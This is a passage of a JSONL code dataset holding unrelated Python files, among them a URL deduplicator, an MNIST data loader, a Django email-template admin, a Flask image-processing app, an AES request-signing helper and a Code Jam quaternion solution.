通过目标字符串的二进制数据获取一个指纹对象,这里可以选择MD5,也可以选择其他加密方式。选择MD5是因为他生成的加密字节串长度较短\n fp = md5(target_string.encode())\n # 通过指纹对象fp获取目标字符串的MD5加密字节串, 并作为函数的返回值\n md5_finger = fp.hexdigest()\n return md5_finger\n\n\ndef _sort_url(target_url):\n \"\"\"\n 为可能存在GET参数的URL进行参数排序\n :param target_url: 目标URL\n :return: 排序后的目标URL\n \"\"\"\n # 如果URL中没有GET请求参数,则直接返回URL\n if \"?\" not in target_url:\n return target_url\n\n # 如果URL中存在GET请求参数,则对参数进行排序后重组URL\n url_str = target_url.split('?')[0]\n get_query_str = target_url.split('?')[1]\n\n # 如果存在多个GET参数,则讲GET参数进行分割后按序重新组合,再与URL路径重组\n if \"&\" in get_query_str:\n query_list = get_query_str.split('&')\n query_list.sort()\n get_query_str = \"&\".join(query_list)\n\n # 重组URL,并作为函数的返回值\n new_url = url_str + '?' 
+ get_query_str\n return new_url\n\n\ndef check_url_finger(target_url):\n \"\"\"\n 为将要访问的URL进行可能存在参数排序后创建数据指纹\n :param target_url: 将要访问的URL\n :return: 返回一个数据指纹\n \"\"\"\n # 首先对URL中的可能存在的GET请求参数进行排序,因为GET请求参数是无序的。\n # 要保证不能因为可能存在的GET请求参数的顺序不同而重复访问下载一个页面。\n url_sorted = _sort_url(target_url=target_url)\n # 获取排序后的URL的MD5加密指纹字节串\n url_finger = _finger_maker(url_sorted)\n # 尝试将指纹添加到redis数据库的set集合中,如果无法插入则表示指纹已经存在\n result = redis_terminal.sadd(URL_FP_KEY, url_finger)\n return True if result == 1 else False\n\n\n\n\nif __name__ == '__main__':\n # finger_str = _finger_maker(target_string='nihaonishibushia')\n # print(finger_str)\n pass\n","sub_path":"respDownloader/URLexaminer.py","file_name":"URLexaminer.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"402427780","text":"from keras.datasets import mnist\r\nimport tensorflow as tf\r\n\r\ndef read_and_preprocess_mnist(features, labels):\r\n num_classes = 10\r\n\r\n features = tf.cast(tf.reshape(features, [28,28]), tf.float32) / 255\r\n features = tf.expand_dims(features, axis=-1)\r\n labels = tf.cast(tf.one_hot(labels,num_classes), tf.int32)\r\n return features, labels\r\n\r\n# set the batch dimension to a constant size. This makes TPUs happy.\r\ndef _set_shapes(batch_size, features, labels, transpose_input = False, extra_dims = 0):\r\n \"\"\"Statically set the batch_size dimension.\"\"\"\r\n \"\"\"needed to make batch_size read as a fixed value to make TPUs happy\"\"\"\r\n \r\n def _set_shape_transpose(x, batch_size = batch_size):\r\n x.set_shape(x.get_shape().merge_with(tf.TensorShape([None] * extra_dims + [batch_size])))\r\n \r\n def _set_shape(x, extra_dims = 0, batch_size = batch_size):\r\n x.set_shape(x.get_shape().merge_with(tf.TensorShape([batch_size] + [None] * extra_dims)))\r\n\r\n if transpose_input:\r\n _set_shape_transpose(features, 3)\r\n _set_shape_transpose(labels)\r\n else:\r\n _set_shape(features, 3)\r\n _set_shape(labels)\r\n return features, labels\r\n\r\ndef get_mnist_datset(flags, is_training = True):\r\n batch_size = flags.batch_size\r\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\r\n\r\n if is_training:\r\n dataset = tf.data.Dataset.from_tensor_slices((x_train, y_train))\r\n dataset = dataset.repeat()\r\n dataset = dataset.shuffle(128)\r\n else:\r\n dataset = tf.data.Dataset.from_tensor_slices((x_test, y_test))\r\n # augment and batch\r\n dataset = dataset.map(read_and_preprocess_mnist)\r\n\r\n # note the batch diminsion is assumed in this syntax\r\n dataset = dataset.padded_batch(batch_size=batch_size, \r\n padded_shapes = ([28,28,1],[10]),\r\n drop_remainder=True)\r\n\r\n # assign static shape. 
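check_url_finger above can be exercised without Redis; a hypothetical in-memory variant with the same sort-then-hash normalization makes the dedup behavior easy to test:

```python
from hashlib import md5

seen = set()

def is_new_url(url: str) -> bool:
    path, _, query = url.partition("?")
    if query:                                  # GET params are order-insensitive
        url = path + "?" + "&".join(sorted(query.split("&")))
    fingerprint = md5(url.encode()).hexdigest()
    if fingerprint in seen:
        return False
    seen.add(fingerprint)
    return True

assert is_new_url("http://x.test/?a=1&b=2")
assert not is_new_url("http://x.test/?b=2&a=1")   # same URL, params reordered
```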
Needed only for TPU training.\r\n # dataset = dataset.map(\r\n # functools.partial(_set_shapes, batch_size)\r\n # )\r\n\r\n # prefetch data while training\r\n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\r\n \r\n return dataset","sub_path":"mnist_testing/mnist_data_loader.py","file_name":"mnist_data_loader.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"227215913","text":"import sys\nimport os\n\nfrom role2md.tasks.tasks_parser import parse_tasks\nfrom role2md.defaults.defaults_parser import parse_defaults\nfrom role2md.table2md import table_to_md\nfrom role2md.templates.templates_parser import parse_templates\n\n\ndef main(argv):\n root_dir = argv[0]\n table = {}\n\n if not os.path.exists(root_dir):\n raise Exception(\"{} does not exists.\".format(root_dir))\n\n # Parse all the default files in the role\n if os.path.exists(root_dir + \"/defaults\"):\n for subdir, dirs, files in os.walk(root_dir + \"/defaults\"):\n for file in files:\n parse_defaults((os.path.join(subdir, file)), table)\n print(\"Defualt: {}\".format(os.path.join(subdir, file)))\n\n # Parse main.yml task recursively, if main.yml exists\n if os.path.exists(root_dir + \"/tasks\"):\n scanned_files, registered_vars = parse_tasks((os.path.join(root_dir, \"tasks/main.yml\")), table, True)\n print(\"Files scanned:\\n\\t\\t\" + '\\n\\t\\t'.join(scanned_files))\n else:\n raise Exception(\"{}/task/main.yml does not exists.\".format(root_dir))\n\n # Parse all the template files in the role\n if os.path.exists(root_dir + \"/templates\"):\n for subdir, dirs, files in os.walk(root_dir + \"/templates\"):\n for file in files:\n parse_templates((os.path.join(subdir, file)), table, registered_vars)\n print(\"Template: {}\".format(os.path.join(subdir, file)))\n else:\n print(\"Skipping templates - Templates not found.\")\n\n # Generate the markdown table from the collected variables\n md_table = table_to_md(table)\n print(md_table)\n\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv[1:]))\n","sub_path":"role2md.py","file_name":"role2md.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"167606828","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n \n def printLList(self): \n current = self\n lst = []\n while (current):\n lst.append(current.val) \n current = current.next\n print(lst)\n\ndef makeLLFromList(items):\n \"\"\"Given a list of items, return the head of the linked list.\"\"\"\n head = None\n if items: \n previous = ListNode(items[0])\n head = previous\n \n for i in range(1, len(items)): \n new_node = ListNode(items[i])\n previous.next = new_node\n previous = new_node\n return head\n\ndef swapPairs(A):\n \"\"\"\n Given a linked list head, swap every two adjacent nodes and return the new head.\n\n @param A : head node of linked list\n @return the head node in the linked list\n\n \"\"\"\n\n a = A\n b = A.next\n head = b if A and A.next else A\n\n previous = None\n\n while a and b: \n a.next = b.next\n b.next = a\n if previous: \n previous.next = b\n previous = a\n a = a.next\n if a: \n b = a.next\n else: \n b = None\n\n return head\n \nlst = [28, 34, 48, 74, 42, 49, 37, 59, 97, 96, 73, 44, 39, 50, 80]\nhead = makeLLFromList(lst) \nswapped = swapPairs(head)\nswapped.printLList() #[34, 28, 74, 48, 49, 42, 59, 37, 96, 97, 44, 73, 50, 39, 
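The input pipeline above follows the usual tf.data recipe; stripped to its essentials on dummy arrays (TensorFlow 2.x assumed, shapes invented for illustration), it reads:

```python
import numpy as np
import tensorflow as tf

x = np.zeros((8, 28, 28), dtype=np.uint8)
y = np.arange(8) % 10

ds = (tf.data.Dataset.from_tensor_slices((x, y))
      .map(lambda f, l: (tf.cast(f, tf.float32) / 255.0, tf.one_hot(l, 10)))
      .batch(4, drop_remainder=True)
      .prefetch(tf.data.experimental.AUTOTUNE))

for features, labels in ds:
    print(features.shape, labels.shape)   # (4, 28, 28) (4, 10)
```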
80]","sub_path":"week_1/ib_swap_list_nodes_pairs.py","file_name":"ib_swap_list_nodes_pairs.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"754203","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport logging\nimport warnings\n\n\nfrom django import forms\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.core.exceptions import ValidationError, ImproperlyConfigured\nfrom django.forms import BaseInlineFormSet, widgets\nfrom django.forms.widgets import TextInput\nfrom django.template.defaultfilters import safe\nfrom django.utils import six\nfrom django.utils.html import strip_spaces_between_tags, escape\nfrom django.utils.safestring import mark_safe\nfrom django.utils.text import Truncator\nfrom django.utils.translation import ugettext, ugettext_lazy as _, ungettext\n\nfrom . import settings as postoffice_settings\nfrom .fields import CommaSeparatedEmailField\nfrom .models import Attachment, Log, Email, EmailTemplate, STATUS, AttachmentTemplate\nfrom .utils import render_to_template_email\n\nlogger = logging.getLogger(__name__)\n\nclass LogInline(admin.StackedInline):\n model = Log\n extra = 0\n\nclass AttachmentInline(admin.TabularInline):\n model=Attachment.emails.through\n readonly_fields = ('display_attachment',)\n fields = ('display_attachment',)\n extra=0\n\n def display_attachment(self,obj):\n if obj and obj.file:\n return '{obj.name}'.format(obj=obj)\n return '---'\n display_attachment.allow_tags= True\n\n\nclass AttachmentTemplateInline(admin.TabularInline):\n model=AttachmentTemplate.email_templates.through\n fields = ('attachmenttemplate',)\n extra=0\n verbose_name = _(\"Email Attachment\")\n verbose_name_plural = _(\"Email Attachments\")\n\n def display_attachment(self,obj):\n if obj and obj.file:\n return '{obj.name}'.format(obj=obj)\n return '---'\n display_attachment.allow_tags= True\n\n\n\nclass CommaSeparatedEmailWidget(TextInput):\n\n def __init__(self, *args, **kwargs):\n super(CommaSeparatedEmailWidget, self).__init__(*args, **kwargs)\n self.attrs.update({'class': 'vTextField'})\n\n def _format_value(self, value):\n # If the value is a string wrap it in a list so it does not get sliced.\n if not value:\n return ''\n if isinstance(value, six.string_types):\n value = [value, ]\n return ','.join([item for item in value])\n\n\n\nclass EmailAdmin(admin.ModelAdmin):\n list_display = ('id', 'to_display', 'subject', 'template',\n 'status', 'last_updated')\n list_filter = ['status', 'template']\n search_fields = ('to', 'subject')\n readonly_fields = (\"display_mail_preview\",)\n\n actions = ['requeue', 'set_as_sent']\n inlines = [LogInline, AttachmentInline]\n\n formfield_overrides = {\n CommaSeparatedEmailField: {'widget': CommaSeparatedEmailWidget}\n }\n\n fieldsets = (\n (None, {'fields': (\n ('subject', 'from_email',),\n ('to', \"cc\", \"bcc\",),\n ('html_message',),\n ('display_mail_preview',),\n ('status', 'priority',),\n )}),\n )\n\n def get_queryset(self, request):\n return super(EmailAdmin, self).get_queryset(request).select_related('template')\n\n def to_display(self, instance):\n return ', '.join(instance.to)\n to_display.short_description = 'to'\n to_display.admin_order_field = 'to'\n\n\n def display_mail_preview(self, obj):\n content = safe(obj.html_message)\n return strip_spaces_between_tags(mark_safe(\"
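swapPairs above special-cases the first pair to compute the new head; a common simplification (a sketch, reusing the ListNode class defined in that file) threads a dummy node in front instead:

```python
def swap_pairs_dummy(head):
    dummy = ListNode(0)          # ListNode as defined earlier in this file
    dummy.next = head
    prev = dummy
    while prev.next and prev.next.next:
        a, b = prev.next, prev.next.next
        a.next, b.next, prev.next = b.next, a, b   # rewire one pair
        prev = a
    return dummy.next
```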
\\\n \".format(**{'mail_message': escape(strip_spaces_between_tags(content))})))\n display_mail_preview.allow_tags = True\n display_mail_preview.short_description = ugettext(\"Preview\")\n\n def requeue(self, request, queryset):\n \"\"\"An admin action to requeue emails.\"\"\"\n rows_updated = queryset.update(status=STATUS.queued)\n self.message_user(request, ungettext('%(count)d mail was requeued',\n '%(count)d mails were requeued',\n rows_updated) % {'count': rows_updated})\n requeue.short_description = _('Requeue selected emails')\n\n def set_as_sent(self, request, queryset):\n \"\"\"An admin action to requeue emails.\"\"\"\n rows_updated = queryset.update(status=STATUS.sent)\n self.message_user(request, ungettext('%(count)d mail was set as sent',\n '%(count)d mails were set as sent',\n rows_updated) % {'count': rows_updated})\n set_as_sent.short_description = _('Set as sent selected emails')\n\n\nclass LogAdmin(admin.ModelAdmin):\n list_display = ('date', 'email', 'status', 'get_message_preview')\n\n def get_message_preview(self, instance):\n return (u'{0}...'.format(instance.message[:25]) if len(instance.message) > 25\n else instance.message)\n get_message_preview.short_description = 'Message'\n\n\nclass SubjectField(TextInput):\n def __init__(self, *args, **kwargs):\n super(SubjectField, self).__init__(*args, **kwargs)\n self.attrs.update({'style': 'width: 610px;'})\n\n\nclass EmailTemplateAdminForm(forms.ModelForm):\n\n language = forms.ChoiceField(choices=settings.LANGUAGES, required=False,\n widget=widgets.HiddenInput,\n help_text=_(\"Render template in alternative language\"),\n label=_(\"Language\"),)\n\n class Meta:\n model = EmailTemplate\n exclude=()\n\n\nclass EmailTemplateInlineFormset(BaseInlineFormSet):\n\n def __init__(self, *args, **kwargs):\n if settings.USE_I18N:\n initial = kwargs.get('initial',[])\n languages = dict(settings.LANGUAGES).keys()\n instance = kwargs.get('instance', None)\n if not instance:\n # If there isn't the instance, I add all project languages\n for ix,language in enumerate(languages):\n if language != settings.LANGUAGE_CODE:\n try:\n initial[ix].update({'language':language})\n except IndexError:\n initial.append({'language': language})\n else:\n # if there is the instance, I add only languages that miss in the translated_templated\n for ix,language in enumerate(languages):\n # boolean variable that is used to find languages to add in 'initial'\n lang_finded = False\n # iteration on translated_templates\n for translated_template in instance.translated_templates.all():\n if translated_template.language == language:\n # translated_template finded --> language not to be included in initial\n lang_finded = True\n break\n # I add language only if it isn't in translated_templates\n if not lang_finded:\n if language != settings.LANGUAGE_CODE:\n try:\n initial[ix].update({'language':language})\n except IndexError:\n initial.append({'language': language})\n kwargs.update({'initial':initial})\n return super(EmailTemplateInlineFormset,self).__init__(*args, **kwargs)\n\nclass EmailTemplateAdminMixin(object):\n\n def get_readonly_fields(self, request, obj=None):\n \"\"\"\n Hook for specifying custom readonly fields.\n \"\"\"\n _readonly_fields = super(EmailTemplateAdminMixin,self).get_readonly_fields(request, obj=obj)\n return list(_readonly_fields) + ['display_html_mail_preview',\n 'display_plain_mail_preview',]\n\n def formfield_for_dbfield(self, db_field, request, **kwargs):\n if db_field.name == 'subject':\n kwargs.update({'widget': SubjectField,\n 
'required': True})\n        elif db_field.name == 'content_data':\n            kwargs.update({'required': True,})\n            _editor_found=False\n            for _editor in postoffice_settings.get_wysiwyg_editors():\n                try:\n                    _module_name = _editor[0]\n                    _widget = _editor[1]\n                    _widget_attrs = _editor[2]\n                    WysiwygEditor = getattr(__import__(_module_name, {}, {}, [_widget]), _widget)\n                    kwargs.update({\n                        'widget': WysiwygEditor(**_widget_attrs)\n                    })\n                    _editor_found = True\n                    break\n                except ImportError:\n                    logger.exception(\"Error Importing WYSIWYG Editor\")\n                except IndexError:\n                    raise ImproperlyConfigured(\"POST_OFFICE.WYSIWYG_EDITORS setting entries are not in form of (,) \")\n            if not _editor_found:\n                warnings.warn(\"Cannot use any editor between {0} because they are not installed. \"\n                              \"Have you installed and configured one of them properly?\"\n                              \"Either you can configure POSTOFFICE_WYSIWYG_EDITORS to use your own editor\"\n                              \"\".format([_editor[1]\n                                         for _editor\n                                         in postoffice_settings.get_wysiwyg_editors()]),\n                              ImportWarning)\n        return super(EmailTemplateAdminMixin,self).formfield_for_dbfield(db_field, request, **kwargs)\n\n    def display_html_mail_preview(self,obj=None):\n        content_preview = render_to_template_email(obj.html_content.replace('{{', '{').replace('}}', '}'), {},\n                                                   is_plain_text=False)\n        return mark_safe(strip_spaces_between_tags(mark_safe(\"\"\"
\n \n
{help_text}
\n
\n \"\"\".format(**{'help_text': _('*The field in brackets are variables!'),\n 'mail_message': escape(strip_spaces_between_tags(content_preview))})\n )))\n display_html_mail_preview.short_description=_(\"Preview HTML\")\n\n def display_plain_mail_preview(self,obj=None):\n content_preview = render_to_template_email(obj.html_content.replace('{{', '{').replace('}}', '}'), {},\n is_plain_text=True)\n return mark_safe(strip_spaces_between_tags(mark_safe(\"\"\"\n
\n \n
{help_text}
\n
\n \"\"\".format(**{'help_text': _('*The field in brackets are variables!'),\n 'mail_message': escape(strip_spaces_between_tags(content_preview))})\n )))\n display_plain_mail_preview.short_description=_(\"Preview Plain\")\n\nclass EmailTemplateInline(EmailTemplateAdminMixin,\n admin.StackedInline):\n form = EmailTemplateAdminForm\n formset = EmailTemplateInlineFormset\n model = EmailTemplate\n verbose_name_plural = _(\"Email Contents\")\n #extra = 0\n fk_name = 'default_template'\n\n fieldsets = ((None, {\n 'fields': (\n ('language', 'template_path','subject',),\n ('content_data',),\n ('display_html_mail_preview',),\n ),\n }),)\n\n\n def get_extra(self, request, obj=None, **kwargs):\n \"\"\"Hook for customizing the number of extra inline forms.\"\"\"\n if obj:\n return len(settings.LANGUAGES) - 1 - obj.translated_templates.count()\n else:\n return len(settings.LANGUAGES) - 1\n\n def get_max_num(self, request, obj=None, **kwargs):\n return len(settings.LANGUAGES) - 1\n\nclass EmailTemplateAdmin(EmailTemplateAdminMixin,\n admin.ModelAdmin):\n change_form_template = 'admin/post_office/email_template_change_form.html'\n form = EmailTemplateAdminForm\n list_display = ('label', 'name', 'template_path','description_shortened', 'subject', 'languages_compact', 'created')\n search_fields = ('label', 'name', 'description', 'subject')\n if settings.USE_I18N:\n inlines = (EmailTemplateInline, AttachmentTemplateInline)\n else:\n inlines = (AttachmentTemplateInline,)\n\n fieldsets = (\n (None, {\n 'fields': (\n ('name',),\n ('label', 'description'),\n )}),\n (None, {\n 'fields': (\n ('template_path','subject',),\n ('content_data',),\n ('display_html_mail_preview'),\n ),\n 'classes':['js-move-to-tabs-default']\n }),\n )\n\n\n def render_change_form(self, request, context, **kwargs):\n context = context or {}\n context.update({\n \"DEFAULT_LANGUAGE\": settings.LANGUAGE_CODE,\n \"USE_I18N\": settings.USE_I18N\n })\n return super(EmailTemplateAdmin,self).render_change_form(request, context, **kwargs)\n\n def formfield_for_dbfield(self, db_field, request, **kwargs):\n if db_field.name == 'template_path':\n kwargs.update({'initial':EmailTemplate.TEMPLATE_CHOICES[0][0]})\n return super(EmailTemplateAdmin,self).formfield_for_dbfield(db_field, request, **kwargs)\n\n def get_queryset(self, request):\n return self.model.objects.filter(default_template__isnull=True)\n\n def description_shortened(self, instance):\n return Truncator(instance.description.split('\\n')[0]).chars(200)\n description_shortened.short_description = _(\"Description\")\n description_shortened.admin_order_field = 'description'\n\n def languages_compact(self, instance):\n languages = [tt.language for tt in instance.translated_templates.order_by('language')]\n return ', '.join(languages)\n languages_compact.short_description = _(\"Languages\")\n\n def save_model(self, request, obj, form, change):\n obj.save()\n # if the name got changed, also change the translated templates to match again\n if 'name' in form.changed_data:\n obj.translated_templates.update(name=obj.name)\n\n\nclass AttachmentAdmin(admin.ModelAdmin):\n list_display = ('name', 'file', 'mimetype')\n\nclass AttachmentTemplateAdmin(admin.ModelAdmin):\n list_display = ('name', 'file', 'mimetype')\n fields = ('name', 'file', 'mimetype')\n\n\n\nadmin.site.register(Email, EmailAdmin)\nadmin.site.register(Log, LogAdmin)\nadmin.site.register(EmailTemplate, EmailTemplateAdmin)\nadmin.site.register(Attachment, AttachmentAdmin)\nadmin.site.register(AttachmentTemplate, 
AttachmentTemplateAdmin)","sub_path":"post_office/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":15185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"260817144","text":"#!/usr/bin/env python3\n\nimport csv\n\nheader = [\"title\", \"authors\", \"groups\", \"keywords\", \"topics\", \"abstract\"]\n\ndef shared_word_count(words, text):\n text_words = text.split(\" \")\n c = 0\n for a, b in zip(words, text_words):\n if a == b:\n c += 1\n return c\n\ndef find(dataset, keywords):\n i = header.index(\"abstract\")\n abstracts = list(map(lambda row: row[i], dataset))\n results = list(sorted(zip(range(len(abstracts)), abstracts), key=lambda x: shared_word_count(keywords, x[1].lower()), reverse=True))[:10]\n return [dataset[i] for i,v in results]\n\n\ndef prompt(dataset):\n keywords = input('> ').split(\" \")\n title_index = header.index(\"title\")\n print(\"\\n\".join([corpus[title_index] for corpus in find(dataset, keywords)]))\n\n\nif __name__ == '__main__':\n dataset = None\n with open('[UCI] AAAI-14 Accepted Papers - Papers.csv', \"r\", encoding='utf-8') as csvfile:\n dataset = csv.reader(csvfile)\n dataset = list(dataset)\n while True:\n prompt(dataset)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"468894785","text":"# print('Enter number of students in each class seperated by space.')\n\n# studentList = list(map(int, input().split()))\n\nstudentList = list(map(int, input('Enter number of students in each class seperated by space.\\n').split()))\n\ndef desksReq(students):\n desks = students/2 if students%2==0 else students//2 + 1\n return desks\n\ndesksList = list(map(desksReq, studentList))\n\nprint(desksList)\nsum = 0\nfor item in desksList:\n sum += item\n\nprint(sum, 'is the number of desks required.') \n\n","sub_path":"practice/desks.py","file_name":"desks.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"461650618","text":"from flask import Flask, render_template, request, jsonify\r\nfrom flask_cors import CORS\r\nimport mdata as md\r\nimport cv2\r\n\r\nimport bender\r\nimport mfilter\r\nimport gorun\r\n\r\n\r\n# 앱 설정\r\napp = Flask(__name__,\r\n static_folder=md.appstatic,\r\n template_folder=md.appstatic)\r\napp.config['UPLOAD_FOLDER'] = md.src\r\ncors = CORS(app, resources= {\r\n r\"*\": {\"origin\": \"*\"}\r\n})\r\n\r\n# 앱 프론트 전송\r\n@app.route(\"/\")\r\ndef front():\r\n return render_template(\"index.html\")\r\n\r\n# 이미지 디렉토리 조회\r\n@app.route(\"/list-source\")\r\ndef img_listing():\r\n return jsonify(md.listing(md.src))\r\n\r\n#이미지 밴\r\n@app.route('/image-banding', methods = ['GET', 'POST'])\r\ndef img_banding():\r\n data = md.jsonparse(request.data)\r\n result = bender.bend(data['image'], data['coord'], data['bound'])\r\n\r\n send = []\r\n for key in result:\r\n md.wipetemp(key, data['image'])\r\n tmp = md.savetemp(key, data['image'], result[key])\r\n send.append(key + '/' + tmp)\r\n\r\n return jsonify(send)\r\n\r\n#필터이미지 생성\r\n@app.route('/run-filter', methods = ['GET', 'POST'])\r\ndef img_filter():\r\n data = md.jsonparse(request.data)\r\n result = mfilter.run_filter(data['image'], data['filter-param'])\r\n return jsonify([result])\r\n\r\n@app.route('/go-run-task', methods=['GET', 'POST'])\r\ndef go_run_task():\r\n data = md.jsonparse(request.data)\r\n result = 
gorun.proccess2(data['image'])\r\n return jsonify(result)\r\n\r\n\r\nfor name in md.listing(md.uploads):\r\n print(name)\r\n img = md.loadimg(md.uploads, name)\r\n md.saveimg(md.src, name.split('.')[0] + '.png', img)\r\n _, width, _ = img.shape\r\n ratio = 150 / width\r\n md.saveimg('thum', name.split('.')[0] + '.png', cv2.resize(img, None, fx=ratio, fy=ratio))\r\n\r\n# 앱 구동\r\nif __name__ == \"__main__\":\r\n # Only for debugging while developing\r\n\r\n app.run(host='0.0.0.0', debug=True, port= 80)\r\n","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"576887824","text":"# -*- coding:utf-8 -*-\r\n\r\nimport time\r\nimport hmac\r\nimport hashlib\r\nimport json\r\nimport uuid\r\nfrom decimal import Decimal\r\n\r\n\r\nfrom Crypto.Cipher import AES\r\nimport base64\r\n\r\n\r\ndef pkcs7padding(text):\r\n \"\"\"\r\n 明文使用PKCS7填充\r\n 最终调用AES加密方法时,传入的是一个byte数组,要求是16的整数倍,因此需要对明文进行处理\r\n :param text: 待加密内容(明文)\r\n :return:\r\n \"\"\"\r\n bs = AES.block_size # 16\r\n length = len(text)\r\n bytes_length = len(bytes(text, encoding='utf-8'))\r\n # tips:utf-8编码时,英文占1个byte,而中文占3个byte\r\n padding_size = length if(bytes_length == length) else bytes_length\r\n padding = bs - padding_size % bs\r\n # tips:chr(padding)看与其它语言的约定,有的会使用'\\0'\r\n padding_text = chr(padding) * padding\r\n return text + padding_text\r\n\r\n\r\ndef pkcs7unpadding(text):\r\n \"\"\"\r\n 处理使用PKCS7填充过的数据\r\n :param text: 解密后的字符串\r\n :return:\r\n \"\"\"\r\n length = len(text)\r\n unpadding = ord(text[length-1])\r\n return text[0:length-unpadding]\r\n\r\n\r\ndef encrypt(key, content):\r\n \"\"\"\r\n AES加密\r\n key,iv使用同一个\r\n 模式cbc\r\n 填充pkcs7\r\n :param key: 密钥\r\n :param content: 加密内容\r\n :return:\r\n \"\"\"\r\n key_bytes = bytes(key, encoding='utf-8')\r\n iv = bytes('ff465fdecc764337', encoding='utf-8')\r\n\r\n cipher = AES.new(key_bytes, AES.MODE_CBC, iv)\r\n # 处理明文\r\n content_padding = pkcs7padding(content)\r\n # 加密\r\n encrypt_bytes = cipher.encrypt(bytes(content_padding, encoding='utf-8'))\r\n # 重新编码\r\n result = str(base64.b64encode(encrypt_bytes), encoding='utf-8')\r\n return result\r\n\r\n\r\ndef decrypt(key, content):\r\n \"\"\"\r\n AES解密\r\n key,iv使用同一个\r\n 模式cbc\r\n 去填充pkcs7\r\n :param key:\r\n :param content:\r\n :return:\r\n \"\"\"\r\n key_bytes = bytes(key, encoding='utf-8')\r\n iv = key_bytes\r\n cipher = AES.new(key_bytes, AES.MODE_CBC, iv)\r\n # base64解码\r\n encrypt_bytes = base64.b64decode(content)\r\n # 解密\r\n decrypt_bytes = cipher.decrypt(encrypt_bytes)\r\n # 重新编码\r\n result = str(decrypt_bytes, encoding='utf-8')\r\n # 去除填充内容\r\n result = pkcs7unpadding(result)\r\n return result\r\n\r\n\r\ndef generateUnixTime():\r\n unixTime = int(time.time())\r\n return unixTime\r\n\r\n\r\ndef HMACSHA256Encrypt(val, key):\r\n signature = hmac.new(bytes(key, encoding='utf-8'), bytes(val, encoding='utf-8'),\r\n digestmod=hashlib.sha256).digest()\r\n HEX = signature.hex()\r\n return HEX\r\n\r\n\r\n# 补足字符串长度为16的倍数\r\ndef add_to_16(s):\r\n while len(s) % 16 != 0:\r\n s += '\\0'\r\n return str.encode(s) # 返回bytes\r\n\r\n\r\ndef AESEncrypt(text, key):\r\n aes = AES.new(str.encode(key), AES.MODE_CBC, iv=str.encode('ff465fdecc764337')) # 初始化加密器\r\n ncrypted_text = str(base64.encodebytes(aes.encrypt(add_to_16(text))), encoding='utf8').replace('\\n', '')\r\n return ncrypted_text\r\n\r\n\r\ndef GenerateSignature(app_key, api_secret):\r\n unixTime = generateUnixTime()\r\n print('unixTime', unixTime)\r\n 
signature = HMACSHA256Encrypt(f\"{app_key}{str(unixTime)}{api_secret}\", api_secret)\r\n print('signature', signature)\r\n\r\n\r\ndef GenerateRequestObj(api_secret):\r\n Name = input('请输入姓名:')\r\n CertificateNum = input('请输入身份证:')\r\n PhoneNum = input('请输入手机号:')\r\n CertificateType = 1\r\n request_list = []\r\n while True:\r\n operate = input('是否继续生成结算信息:y继续输入,n停止输入:')\r\n if operate == 'y':\r\n BankCardNum = input('请输入银行卡号:')\r\n BankName = input('请输入银行名称:')\r\n Money = input('请输入金额:')\r\n request_list.append(\r\n {\r\n 'Name': Name,\r\n 'CertificateNum': CertificateNum,\r\n 'PhoneNum': PhoneNum,\r\n 'CertificateType': CertificateType,\r\n 'BankCardNum': BankCardNum,\r\n 'BankName': BankName,\r\n 'Money': Money,\r\n 'OrderRandomCode': str(uuid.uuid4())\r\n })\r\n else:\r\n request_tr = json.dumps(request_list)\r\n print(encrypt(api_secret,request_tr))\r\n break\r\n\r\ndef GenerateQuerySettle(api_secret):\r\n code = input('请输入结算单号:')\r\n print(encrypt(api_secret,code))\r\n\r\n\r\nif __name__ == '__main__':\r\n app_key = input('请输入app_key:')\r\n api_secret = input('请输入api_secret:')\r\n while True:\r\n operate = input('请输入操作类型:1生成签名,2添加结算单,3查���结算单:')\r\n if operate == '1':\r\n GenerateSignature(app_key, api_secret)\r\n elif operate == '2':\r\n GenerateRequestObj(api_secret)\r\n elif operate == '3':\r\n GenerateQuerySettle(api_secret)\r\n else:\r\n break\r\n","sub_path":"GordenTestTeam/testTeamApp/apiTestPro/entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":5042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"60782588","text":"import numpy as np\r\nimport math\r\nimport time\r\n\r\n\r\ninput_file_name = './C-large.in'\r\noutput_file_name = './C-large.out'\r\n\r\nmult_dict = {'11': '1', '1i':'i', '1j': 'j', '1k':'k',\r\n 'i1': 'i', 'ii':'1', 'ij': 'k', 'ik':'j',\r\n 'j1': 'j', 'ji':'k', 'jj': '1', 'jk':'i',\r\n 'k1': 'k', 'ki':'j', 'kj': 'i', 'kk':'1'}\r\n\r\nsign_dict = {'11': 1, '1i':1, '1j': 1, '1k':1,\r\n 'i1': 1, 'ii':-1, 'ij': 1, 'ik':-1,\r\n 'j1': 1, 'ji':-1, 'jj': -1, 'jk':1,\r\n 'k1': 1, 'ki':1, 'kj': -1, 'kk':-1}\r\n\r\ndef get_product(string_list):\r\n # assume length at least 1\r\n if len(string_list) == 0:\r\n return ''\r\n current_prod = string_list[0]\r\n current_sign = 1\r\n for i in range(1, 